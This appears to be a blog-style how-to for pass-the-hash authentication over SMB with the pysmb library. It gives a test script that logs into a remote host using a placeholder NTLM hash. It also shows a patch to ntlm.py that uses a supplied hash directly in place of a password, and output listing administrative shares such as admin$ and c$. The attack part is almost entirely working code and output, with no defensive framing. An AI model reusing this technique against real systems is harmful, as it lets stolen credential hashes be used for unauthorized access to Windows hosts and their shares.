git clone https://github.com/miketeo/pysmb.git
python setup.py install
Then drop this in test.py
1 2 3 4 5 6 7 8 9 10 11 12 13 |
import sys import pprint from smb.SMBConnection import SMBConnection from util import getConnectionInfo conn = SMBConnection("UserAccount", "!31:70:ae:1e:3e:NT:LM:Hash:Goes:Here:a9:37:fc:e3", "Your IP Here", "RemoteHostname", use_ntlm_v2 = True, is_direct_tcp = True) conn.connect("RemoteHostName", 445) #Use IS TCP Direct on 445 and 135 for the other results = conn.listShares() for smbtest in [r.name.lower() for r in results]: print(smbtest) # pretty print loaded modules #pprint.pprint(sys.modules) #filelist = conn.listPath('shared_folder_name', '/') |
Modify this code in Python\pysmb\python3\smb -> ntlm.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
def generateChallengeResponseV2(password, user, server_challenge, server_info, domain = '', client_challenge = None): client_timestamp = b'\0' * 8 if not client_challenge: client_challenge = bytes([ random.getrandbits(8) for i in range(0, 8) ]) assert len(client_challenge) == 8 if password.startswith("!"): #ntlm_hash = password[1:].replace(":", "").decode("hex") ntlm_hash = bytes.fromhex(password[1:].replace(":", "")) else: d = MD4() d.update(password.encode('UTF-16LE')) ntlm_hash = d.digest() # The NT password hash print("b'" + ''.join('\\x{:02x}'.format(x) for x in ntlm_hash) + "'") #print(ntlm_hash) response_key = hmac.new(ntlm_hash, (user.upper() + domain).encode('UTF-16LE'), 'md5').digest() # The NTLMv2 password hash. In [MS-NLMP], this is the result of NTOWFv2 and LMOWFv2 functions temp = b'\x01\x01' + b'\0'*6 + client_timestamp + client_challenge + b'\0'*4 + server_info ntproofstr = hmac.new(response_key, server_challenge + temp, 'md5').digest() nt_challenge_response = ntproofstr + temp lm_challenge_response = hmac.new(response_key, server_challenge + client_challenge, 'md5').digest() + client_challenge session_key = hmac.new(response_key, ntproofstr, 'md5').digest() for line in traceback.format_stack(): print(line.strip()) return nt_challenge_response, lm_challenge_response, session_key |
Z:\Programming\Python\pysmb\python3\tests\SMBConnectionTests>test.py
File “Z:\Programming\Python\pysmb\python3\tests\SMBConnectionTests\test.py”, line 7, in
conn.connect(“Hostname”, 445)
File “C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\smb\SMBConnection.py”, line 124, in connect
self._pollForNetBIOSPacket(timeout)
File “C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\smb\SMBConnection.py”, line 634, in _pollForNetBIOSPacket
self.feedData(data)
File “C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\nmb\base.py”, line 54, in feedData
self._processNMBSessionPacket(self.data_nmb)
File “C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\nmb\base.py”, line 75, in _processNMBSessionPacket
self.onNMBSessionMessage(packet.flags, packet.data)
File “C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\smb\base.py”, line 144, in onNMBSessionMessage
if self._updateState(self.smb_message):
File “C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\smb\base.py”, line 285, in _updateState_SMB2
self._handleSessionChallenge(message, ntlm_token)
File “C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\smb\base.py”, line 367, in _handleSessionChallenge_SMB2
nt_challenge_response, lm_challenge_response, session_key = ntlm.generateChallengeResponseV2(self.password,
File “C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\smb\ntlm.py”, line 178, in generateChallengeResponseV2
for line in traceback.format_stack():
admin$
c$
d$
ipc$
print$
myShare